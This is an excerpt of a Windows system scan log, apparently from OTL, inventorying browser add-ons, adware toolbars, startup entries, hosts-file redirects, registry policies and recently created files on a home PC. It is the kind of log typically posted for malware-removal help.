[2014.03.24 22:07:30 | 000,000,329 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\search.xml
[2014.03.24 22:13:44 | 000,001,386 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\smartbar.xml
[2014.03.24 22:07:26 | 000,007,852 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\WebSearch.xml
[2013.03.25 22:24:04 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\extensions
[2012.11.02 09:07:30 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files (x86)\mozilla firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2011.11.15 18:16:24 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}
[2012.05.17 10:20:41 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA}
[2012.06.14 16:22:28 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}
[2012.10.28 11:39:34 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA}
[2011.12.21 03:10:41 | 000,134,104 | ---- | M] (Mozilla Foundation) -- C:\Program Files (x86)\mozilla firefox\components\browsercomps.dll
[2010.03.11 00:01:02 | 000,124,272 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\CCMSDK.dll
[2010.03.11 00:02:52 | 000,070,512 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\CgpCore.dll
[2010.03.11 00:01:48 | 000,091,504 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\confmgr.dll
[2010.03.11 00:01:24 | 000,022,384 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\ctxlogging.dll
[2010.03.11 00:40:56 | 000,423,248 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\plugins\npicaN.dll
[2005.08.27 14:08:06 | 001,398,408 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\plugins\NPSWF32.dll
[2010.03.11 00:02:48 | 000,023,920 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\TcpPServ.dll
[2011.10.21 22:41:37 | 000,001,392 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml
[2013.04.26 21:49:01 | 000,006,470 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\babylon.xml
[2011.10.21 22:41:37 | 000,002,252 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\bing.xml
[2011.10.21 22:41:37 | 000,001,153 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml
[2011.10.21 22:41:37 | 000,006,805 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml
[2011.10.21 22:41:37 | 000,001,178 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\wikipedia-de.xml
[2011.10.21 22:41:37 | 000,001,105 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url = 
CHR - default_search_provider: suggest_url = 
CHR - plugin: Error reading preferences file
CHR - Extension: SearchNewTab = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\afddldeabjlloeiaejhkcihpbfjbcnca\1.0\
CHR - Extension: Delta Toolbar = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde\1.5.1_0\
CHR - Extension: SmartBar Chrome Toolbar = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp\1.0_0\
CHR - Extension: IDM Integration = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmolcgpienlcieaajfkkdamlngancncm\6.16.3_0\
CHR - Extension: DefaultTab = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.7_0\
CHR - Extension: greaTsavear = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj\2.7\
CHR - Extension: savenshAriE  = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf\5.10\
CHR - Extension: Google Wallet = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Delta Toolbar = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj\1.0_0\
CHR - Extension: MySearchDial = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff\9.4.24_0\
 
O1 HOSTS File: ([2014.04.02 22:36:43 | 000,000,954 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 activate.adobe.com
O1 - Hosts: 127.0.0.1 practivate.adobe.com
O1 - Hosts: 127.0.0.1 lmlicenses.wip4.adobe.com
O1 - Hosts: 127.0.0.1 lm.licenses.adobe.com
O2:64bit: - BHO: (IDM integration (IDMIEHlprObj Class)) - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll (Internet Download Manager, Tonec Inc.)
O2:64bit: - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Programme\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2:64bit: - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Programme\Alwil Software\Avast5\aswWebRepIE64.dll (AVAST Software)
O2:64bit: - BHO: (Windows Live ID Sign-in Helper) - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
O2:64bit: - BHO: (Google Toolbar Helper) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O2:64bit: - BHO: (Skype add-on for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O2:64bit: - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Programme\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2:64bit: - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (IDM integration (IDMIEHlprObj Class)) - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll (Internet Download Manager, Tonec Inc.)
O2 - BHO: (&Yahoo! Toolbar Helper) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn1\yt.dll (Yahoo! Inc.)
O2 - BHO: (VisualBee) - {11111111-1111-1111-1111-110311391106} - C:\Program Files (x86)\VisualBee\VisualBee-bho.dll File not found
O2 - BHO: (PasswordBox Helper) - {5DB69B97-934B-451D-94DB-32EF802A01CD} - C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (DefaultTab Browser Helper) - {7F6AFBF1-E065-4627-A2FD-810366367D01} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\DefaultTabBHO.dll (Search Results LLC.)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Programme\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (Related Searches) - {96A25A24-2E87-4374-8A50-CC6F943FCE4D} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll (Search Results)
O2 - BHO: (MinibarBHO) - {AA74D58F-ACD0-450D-A85E-6C04B171C044} - C:\Program Files (x86)\Minibar\Minibar.dll (KangoExtensions)
O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Soearachh-NewTiaabi) - {B92742C8-903F-6740-0B5A-F4F00ABBBCAC} - C:\ProgramData\Soearachh-NewTiaabi\518a8709b4b4e.dll ()
O2 - BHO: (delta Helper Object) - {C1AF5FA5-852C-4C90-812E-A7F75E011D87} - C:\Program Files (x86)\Delta\delta\1.8.21.5\bh\delta.dll (Delta-search.com)
O2 - BHO: (Bing Bar BHO) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (mysearchdial Helper Object) - {EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD} - C:\Program Files (x86)\Mysearchdial\1.8.21.0\bh\mysearchdial.dll (MySearchDial)
O2 - BHO: (SmartBar Helper Object) - {FD36FEBE-DBA1-4597-9DD1-B13794B92F68} - C:\Program Files (x86)\Bechiro S.L\smartbar\1.8.8.12\bh\smartbar.dll (Montera Technologeis LTD)
O2 - BHO: (Yontoo) - {FD72061E-9FDE-484D-A58A-0BAB4151CAD8} - C:\Program Files (x86)\Yontoo\YontooIEClient.dll (Yontoo LLC)
O2 - BHO: (SingleInstance Class) - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\PROGRA~2\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll (Yahoo! Inc)
O3:64bit: - HKLM\..\Toolbar: (Google Toolbar) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O3:64bit: - HKLM\..\Toolbar: (no name) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No CLSID value found.
O3:64bit: - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (SmartBar Toolbar) - {0CFBE80D-5608-4309-A0F5-3B1414833432} - C:\Program Files (x86)\Bechiro S.L\smartbar\1.8.8.12\smartbarTlbr.dll (Montera Technologeis LTD)
O3 - HKLM\..\Toolbar: (PasswordBox) - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} - C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
O3 - HKLM\..\Toolbar: (mysearchdial Toolbar) - {3004627E-F8E9-4E8B-909D-316753CBA923} - C:\Program Files (x86)\Mysearchdial\1.8.21.0\mysearchdialTlbr.dll (MySearchDial)
O3 - HKLM\..\Toolbar: (Delta Toolbar) - {82E1477C-B154-48D3-9891-33D83C26BCD3} - C:\Program Files (x86)\Delta\delta\1.8.21.5\deltaTlbr.dll (Delta-search.com)
O3 - HKLM\..\Toolbar: (@C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll,-100) - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll (Microsoft Corporation)
O3 - HKLM\..\Toolbar: (Related Searches) - {96A25A24-2E87-4374-8A50-CC6F943FCE4D} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll (Search Results)
O3 - HKLM\..\Toolbar: (Yahoo! Toolbar) - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn1\yt.dll (Yahoo! Inc.)
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3:64bit: - HKCU\..\Toolbar\WebBrowser: (Google Toolbar) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O3 - HKCU\..\Toolbar\WebBrowser: (PasswordBox) - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} - C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: []  File not found
O4 - HKLM..\Run: [AdobeCEPServiceManager] C:\Program Files (x86)\Common Files\Adobe\CEPServiceManager4\CEPServiceManager.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [Aeria Ignite] C:\Program Files (x86)\Aeria Games\Ignite\aeriaignite.exe (Aeria Games & Entertainment)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\Alwil Software\Avast5\AvastUI.exe (AVAST Software)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)
O4 - HKLM..\Run: [VNPT-CA CL Token Manager V1_std] C:\Program Files (x86)\VNPT-CA\VNPT-CA CL Token Manager v1\vnpt-ca_cl_v1_certd.exe (VNPT-CA)
O4 - HKLM..\Run: [YouCam Service6] C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe (CyberLink Corp.)
O4 - HKCU..\Run: [BackgroundContainer] "C:\Windows\SysWOW64\Rundll32.exe" "C:\Users\Papa\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun File not found
O4 - HKCU..\Run: [HP Photosmart 6510 series (NET)] C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe (Hewlett-Packard Co.)
O4 - HKCU..\Run: [IDMan] C:\Program Files (x86)\Internet Download Manager\IDMan.exe (Tonec Inc.)
O4 - HKCU..\Run: [Tiny download manager] C:\Users\Papa\AppData\Local\DM\TinyDM.exe (http://www.tinydm.com/)
O4:64bit: - HKLM..\RunOnce: [*WerKernelReporting] C:\Windows\SysNative\WerFault.exe (Microsoft Corporation)
O4 - HKCU..\RunOnce: [Avast-Browser-Cleanup] C:\Program Files\Alwil Software\Avast5\BrowserCleanup.exe (AVAST Software)
O4 - Startup: C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft SharePoint Workspace.lnk =  File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: LogonHoursAction = 2
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DontDisplayLogonHoursWarnings = 1
O8:64bit: - Extra context menu item: An OneNote s&enden - C:\Programme\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O8:64bit: - Extra context menu item: Bild an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm ()
O8:64bit: - Extra context menu item: Download all links with IDM - C:\Program Files (x86)\Internet Download Manager\IEGetAll.htm ()
O8:64bit: - Extra context menu item: Download with IDM - C:\Program Files (x86)\Internet Download Manager\IEExt.htm ()
O8:64bit: - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\Papa\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm ()
O8:64bit: - Extra context menu item: Google Sidewiki... - res://C:\Program Files (x86)\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_7461B1589E8B4FB7.dll/cmsidewiki.html File not found
O8:64bit: - Extra context menu item: Nach Microsoft E&xcel exportieren - C:\Programme\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8:64bit: - Extra context menu item: Seite an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O8 - Extra context menu item: An OneNote s&enden - C:\Programme\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O8 - Extra context menu item: Bild an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm ()
O8 - Extra context menu item: Download all links with IDM - C:\Program Files (x86)\Internet Download Manager\IEGetAll.htm ()
O8 - Extra context menu item: Download with IDM - C:\Program Files (x86)\Internet Download Manager\IEExt.htm ()
O8 - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\Papa\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm ()
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files (x86)\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_7461B1589E8B4FB7.dll/cmsidewiki.html File not found
O8 - Extra context menu item: Nach Microsoft E&xcel exportieren - C:\Programme\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Seite an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9:64bit: - Extra Button: An OneNote senden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Programme\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9:64bit: - Extra 'Tools' menuitem : An OneNote s&enden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Programme\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9:64bit: - Extra Button: Verknüpfte &OneNote-Notizen - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Programme\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9:64bit: - Extra 'Tools' menuitem : Verknüpfte &OneNote-Notizen - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Programme\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9:64bit: - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O9:64bit: - Extra Button: @C:\Program Files\WIDCOMM\Bluetooth Software\btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9:64bit: - Extra 'Tools' menuitem : @C:\Program Files\WIDCOMM\Bluetooth Software\btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O9 - Extra Button: Search - {AAA38851-3CFF-475F-B5E0-720D3645E4A5} - C:\Program Files (x86)\Minibar\Minibar.dll (KangoExtensions)
O9 - Extra Button: Senden an Bluetooth - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O9 - Extra 'Tools' menuitem : Senden an &Bluetooth-Gerät... - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()
O10:[b]64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)
O10:[b]64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)
O10:[b]64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000010 [] - C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKCU\..Trusted Domains: aeriagames.com ([]http in Trusted sites)
O15 - HKCU\..Trusted Domains: aeriagames.com ([]https in Trusted sites)
O15 - HKCU\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: freerealms.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: soe.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: sony.com ([]* in Trusted sites)
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.aka...vex-2.2.5.7.cab (DLM Control)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{17D9B602-7FC4-4529-A557-E1456C40D5AF}: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{17D9B602-7FC4-4529-A557-E1456C40D5AF}: NameServer = 8.8.8.8,8.8.4.4
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{309BDE44-686D-41C2-BD31-97E59FC80850}: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{E104DFEA-8824-4AF6-B1FB-DB2EA7431B75}: DhcpNameServer = 139.7.30.125 139.7.30.126
O18:[b]64bit: - Protocol\Handler\haufereader - No CLSID value found
O18:[b]64bit: - Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit: - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Programme\Common Files\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)
O18:[b]64bit: - Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit: - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O18:[b]64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\haufereader - No CLSID value found
O18 - Protocol\Handler\ms-help - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL (Skype Technologies)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O18:[b]64bit: - Protocol\Filter\application/x-ica - No CLSID value found
O18:[b]64bit: - Protocol\Filter\ica - No CLSID value found
O18:[b]64bit: - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Programme\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)
O18 - Protocol\Filter\application/x-ica {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
O18 - Protocol\Filter\ica {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
O20 - AppInit_DLLs: (c:\progra~3\bitguard\271769~1.27\{c16c1~1\bitguard.dll) -  File not found
O20:[b]64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O28:[b]64bit: - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Programme\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{bc1d265d-fc35-11e3-b3d0-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{bc1d265d-fc35-11e3-b3d0-806e6f6e6963}\Shell\AutoRun\command - "" = F:\autorun.exe
O33 - MountPoints2\{f83808f1-fc17-11e3-a4b2-60eb69562f4e}\Shell - "" = AutoRun
O33 - MountPoints2\{f83808f1-fc17-11e3-a4b2-60eb69562f4e}\Shell\AutoRun\command - "" = F:\autorun.exe
O33 - MountPoints2\E\Shell - "" = AutoRun
O33 - MountPoints2\E\Shell\AutoRun\command - "" = E:\setup_vmc_lite.exe /checkApplicationPresence
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit: - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014.08.09 22:03:26 | 000,000,000 | ---D | C] -- C:\Users\Papa\Documents\SimCity
[2014.08.09 21:45:15 | 000,000,000 | ---D | C] -- C:\Users\Papa\AppData\Roaming\install
[2014.07.24 02:43:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Vodafone
[2014.07.18 20:11:12 | 000,000,000 | --SD | C] -- C:\Windows\SysNative\CompatTel
[2014.02.16 15:42:08 | 000,290,265 | RHS- | C] (Microsoft) -- C:\Users\Papa\AppData\Roaming\mrsys.exe
[2014.02.16 15:42:04 | 000,290,210 | ---- | C] (Microsoft) -- C:\Users\Papa\AppData\Local\.exe
